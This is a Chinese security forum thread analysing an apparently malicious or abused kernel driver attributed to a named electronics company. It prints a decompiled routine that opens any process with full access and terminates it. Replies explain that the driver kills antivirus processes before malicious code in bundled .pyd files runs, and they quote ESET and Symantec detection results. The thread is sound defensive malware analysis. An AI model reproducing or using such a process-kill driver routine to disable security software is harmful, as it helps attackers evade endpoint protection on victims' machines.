漏洞驅動 科胜电子科技有限公司

swizzer

low。。。除了杀进程毫无用处





char __fastcall sub_1400011E4(unsigned int a1)
{
  int v2; // edi
  char result; // al
  struct _CLIENT_ID ClientId; // [rsp+20h] [rbp-40h] BYREF
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+30h] [rbp-30h] BYREF
  void *ProcessHandle; // [rsp+78h] [rbp+18h] BYREF

  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 0;
  ObjectAttributes.ObjectName = 0i64;
  ClientId.UniqueThread = 0i64;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  ClientId.UniqueProcess = (HANDLE)(int)a1;
  ObjectAttributes.Length = 48;
  v2 = ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
  if ( v2 < 0 )
  {
    DbgPrint("Open Process %d Failed!\n", a1);
    result = 0;
  }
  else
  {
    DbgPrint("Open Process %d Successful!\n", a1);
    ZwTerminateProcess(ProcessHandle, v2);
    ZwClose(ProcessHandle);
    result = 1;
  }
  return result;
}

你开心就好

swizzer 发表于 2023-8-20 13:08
low。。。除了杀进程毫无用处

会不会文件还在积极开发完善中 或者是要搭配什么东西才好
如果仅仅是kill进程一个功能定义 那真的无聊

隔山打空气

你开心就好 发表于 2023-8-20 16:00
会不会文件还在积极开发完善中 或者是要搭配什么东西才好
如果仅仅是kill进程一个功能定义 那真的无聊

所以别给他们机会，逮到了直接上报，拉黑整个数字签名，要不然过段时间谁知道会搞什么多阶段复合样本（

anthonyqian

你开心就好 发表于 2023-8-20 16:00
会不会文件还在积极开发完善中 或者是要搭配什么东西才好
如果仅仅是kill进程一个功能定义 那真的无聊

结束杀软进程是很重要的一步

你开心就好

anthonyqian 发表于 2023-8-20 16:04
结束杀软进程是很重要的一步

不否认你这个说法
但是仅仅是匹配相关进程并Kill进程单一功能的话
那给人大部分的感觉是 90％是恶作剧程序10％是未开发完成

swizzer

你开心就好 发表于 2023-8-20 16:00
会不会文件还在积极开发完善中 或者是要搭配什么东西才好
如果仅仅是kill进程一个功能定义 那真的无聊

后续恶意代码在那一堆pyd文件里。结束杀软进程后R3层面的恶意代码就够用了。

wwwab

https://bbs.kafan.cn/thread-2259642-1-1.html

anthonyqian

ESET入库，同时对原样本统一报法：

The detection for this threat will be included in the next update of detection engine, expected version: 27772.

fw1.exe - Win64/Agent.CTT trojan
kavservice.sys - Win64/Agent.CTT trojan

Symantec：不杀

File is not malicious itself, but may be an artifact of a threat.

dght432

GreatMOLA

anthonyqian 发表于 2023-8-21 00:56
ESET入库，同时对原样本统一报法：

Symantec：不杀

铁壳fw1.exe已经机学转拉黑。